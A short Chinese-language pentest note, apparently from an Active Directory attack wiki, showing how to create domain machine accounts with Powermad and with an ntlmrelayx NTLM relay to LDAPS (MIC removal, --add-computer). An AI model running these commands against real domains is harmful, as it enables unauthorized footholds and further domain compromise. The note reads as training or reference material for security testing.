创建机器用户

域内普通用户都有属性ms-DS-MachineAccountQuota默认为10，代表默认可以创建十个机器用户

机器用户也是有域用户的一些属性，如果有机器用户凭据也可以用机器用户在域内进行域渗透

powermad创建机器用户

# 导入powermad
import-module .\powermad.ps1

# 设置机器账户的密码
$Password = ConvertTo-SecureString 'Passw0rd' -AsPlainText -Force

# 通过 New-MachineAccount 函数创建机器账户
 New-MachineAccount -MachineAccount "test" -Password $($Password) -Domain "fbi.gov" -DomainCon
troller "dc.fbi.gov" -Verbose

NTLM Relay to LDAPS创建机器用户

需要域控制器未开启策略域控制器：LDAP服务器通道绑定令牌要求，默认没有设置

python3 ntlmrelayx.py -t ldaps://10.10.10.144 --add-computer --remove-mic --no-dump -smb2support

机器用户也可以添加机器用户，我这里使用强制身份验证让域内某个机器对kaili进行身份验证并relay到ldaps添加机器用户

python3 ntlmrelayx.py -t ldaps://10.10.10.144 --add-computer --remove-mic --no-dump -smb2support

Previous域用户枚举+密码喷洒+本地administrator账户密码暴力破解 NextDACL滥用On_User&DCSync

Last updated 2 years ago

hashtagpowermad创建机器用户

hashtagNTLM Relay to LDAPS创建机器用户

powermad创建机器用户

NTLM Relay to LDAPS创建机器用户